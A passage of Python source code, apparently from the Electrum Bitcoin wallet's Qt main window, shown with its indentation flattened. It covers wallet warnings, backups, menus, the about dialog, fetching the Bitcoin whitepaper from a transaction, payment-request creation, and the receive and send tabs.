if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
'\n\n',
_('For Lightning requests, payments will not be accepted after the expiration.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
